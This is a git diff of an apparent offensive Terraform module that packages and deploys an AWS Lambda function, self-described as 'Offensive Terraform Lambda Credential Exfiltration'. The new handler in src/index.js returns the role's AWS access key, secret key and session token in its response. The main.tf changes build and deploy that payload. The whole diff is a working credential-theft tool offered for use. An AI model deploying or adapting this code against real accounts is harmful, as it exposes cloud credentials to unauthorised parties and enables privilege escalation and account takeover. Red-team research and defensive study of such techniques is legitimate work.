diff --git a/main.tf b/main.tf index 0fba0a2..dffc4e6 100644 --- a/main.tf +++ b/main.tf @@ -1,10 +1,16 @@ +data "archive_file" "payload" { + type = "zip" + source_dir = "src" + output_path = "${path.module}/.terraform/modules/lambda-function-credential-exfiltration/payload.zip" +} + resource "aws_lambda_function" "this" { - filename = ".terraform/modules/lambda-function-credential-exfiltration/payload.zip" + filename = data.archive_file.payload.output_path function_name = "test" role = var.role_arn handler = "index.handler" - source_code_hash = filebase64sha256(".terraform/modules/lambda-function-credential-exfiltration/payload.zip") + source_code_hash = filebase64sha256(data.archive_file.payload.output_path) runtime = "nodejs12.x" } diff --git a/payload.zip b/payload.zip deleted file mode 100644 index a0b8b58..0000000 Binary files a/payload.zip and /dev/null differ diff --git a/src/index.js b/src/index.js new file mode 100644 index 0000000..9add90f --- /dev/null +++ b/src/index.js @@ -0,0 +1,12 @@ +exports.handler = async (event) => { + + const response = { + statusCode: 200, + body: { + "AWS_ACCESS_KEY_ID": process.env.AWS_ACCESS_KEY_ID, + "AWS_SECRET_ACCESS_KEY": process.env.AWS_SECRET_ACCESS_KEY, + "AWS_SESSION_TOKEN": process.env.AWS_SESSION_TOKEN + }, + }; + return response; +}; diff --git a/src/package-lock.json b/src/package-lock.json new file mode 100644 index 0000000..4b0e193 --- /dev/null +++ b/src/package-lock.json @@ -0,0 +1,5 @@ +{ + "name": "payload", + "version": "1.0.0", + "lockfileVersion": 1 +} diff --git a/src/package.json b/src/package.json new file mode 100644 index 0000000..8ef8a97 --- /dev/null +++ b/src/package.json @@ -0,0 +1,12 @@ +{ + "name": "payload", + "version": "1.0.0", + "description": "Offensive Terraform Lambda Credential Exfiltration", + "main": "index.js", + "scripts": { + "test": "echo \"Error: no test specified\" && exit 1" + }, + "author": "Itgel Ganbold", + "license": "ISC", + "dependencies": {} +}